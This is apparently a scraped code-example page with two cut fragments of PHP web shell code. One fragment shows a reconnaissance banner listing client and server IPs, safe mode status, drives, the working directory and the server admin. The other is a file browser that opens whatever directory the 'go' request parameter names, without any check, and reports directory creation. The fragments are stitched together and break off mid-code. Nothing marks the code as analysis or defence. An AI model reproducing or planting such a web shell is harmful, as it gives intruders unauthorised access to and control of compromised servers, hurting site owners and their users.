?>
<br />
Your IP : <?php 
    getClientIp();
    ?>
 <font color="silver" >|</font> Server IP : <?php 
    getServerIp();
    ?>
 <br />
            Safe Mode : <?php 
    getSafeMode();
    ?>
<br />
            <?php 
    if ($os == 'Windows') {
        echo showDrives();
    }
    ?>
 <?php 
    echo getcwd();
    ?>
            </div>
            </td>
        </tr>
    </tbody>
</table>
<div class="header" id="borders">
            Server ADMIN: <?php 
    echo $_SERVER['SERVER_ADMIN'];
    ?>
 <font color="silver" >|</font>
示例#2
0
                            echo '&nbsp;&nbsp;&nbsp;&nbsp;<font color="#b0b000">Directory created</font><br><br>';
                        } else {
                            echo '&nbsp;&nbsp;&nbsp;&nbsp;<font color="red">Problem creating directory</font><br><br>';
                        }
                    }
                }
            }
        }
        $self = $_SERVER['PHP_SELF'];
        $dir = getcwd();
        if (isset($_GET['go'])) {
            $dir = $_GET['go'];
        }
        if (is_dir($dir)) {
            $handle = opendir($dir);
            showDrives();
            ?>
<br><br>&nbsp;&nbsp;&nbsp;&nbsp;<b class="teke"><a style="color:#009900" href="<?php 
            echo $_SERVER['PHP_SELF'] . '?action=mumpet&go=' . getcwd();
            ?>
/../"> &nbsp;back&nbsp; </a></b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b class="teke"><a id="teke" style="color:#009900" href="<?php 
            echo $_SERVER['HTTP_REFERER'];
            ?>
">&nbsp; forward&nbsp; </a></b>&nbsp;&nbsp;<br><br>
<?php 
            if ($dir[strlen($dir) - 1] != '/') {
                $dir = $dir . '/';
            }
            while (($file = readdir($handle)) != false) {
                if ($file != "." && $file != "..") {